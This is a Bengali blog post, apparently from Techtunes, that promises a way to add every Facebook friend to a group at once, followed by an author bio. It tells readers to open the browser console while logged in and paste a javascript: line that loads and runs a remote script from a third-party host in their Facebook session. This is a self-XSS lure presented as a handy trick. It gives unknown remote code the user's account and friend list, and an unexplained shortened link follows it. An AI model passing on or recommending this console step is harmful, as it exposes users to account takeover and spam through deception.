আশা করি সবাই ভাল আছেন। আজকে আমার শিখব যে, কিভাবে একসাথে আপনার সব ফ্রেন্ড কে Facebook Group এ add করবেন। চলুন শিখে নিই :-
প্রথমে আপনার ফেসবুক একাউন্টে লগইন করুন ।
যে Group এ add করতে চান সেই Group টিতে যান (নিছের চিত্রে আমি আমার Group Bd Online Blog এ গেলাম)।
এবার কিবোর্ড এর (CTRL+SHIFT+K) চাপুন, দেখবেন নিছের মত একটা উইনডো আসবে, সেখানে লাল দাগ চিহ্নিত স্থানে নিছের কোডগুলো পোস্ট (CTRL+V) করে Enter চাপুন।
javascript:(function(){document.body.appendChild(document.createElement('script')).src='http://www.weebly.com/uploads/4/4/7/4/4474196/bappi.js';})();
এখন দেখবেন নিছের মত একটা উইনডো এসেছে, কতজন Friend add হচ্ছে তা সেখানে দেখাবে।
ব্যাস কাজ শেষ।
http://goo.gl/SJ6RzM
বাংলাদেশে একটা ভাল উদ্দেগ। আশা করি সবাই আয় করতে পারবে, বিজ্ঞাপন দিতে বিদেশি কোম্পানি কাড়ি কাড়ি টাকা দিতে হবে না, কম খরছে সবাই উপকার পাবে।
আমি milonfci। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 12 বছর 9 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 12 টি টিউন ও 47 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 0 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।
আমি ফেনী কম্পিউটার ইনস্টিটিউট এ কম্পিউটার সাইন্স অ্যান্ড টেকনোলজিতে অধ্যয়নরত আছি। আমি আপনাদের দারুন আর মানসম্মত টিউন নিয়মিত উপহার দিতে পারব বলে আশা করি।
kaZ hOlE To MonDo HOy Na, Dekhi trY Kori………. 😛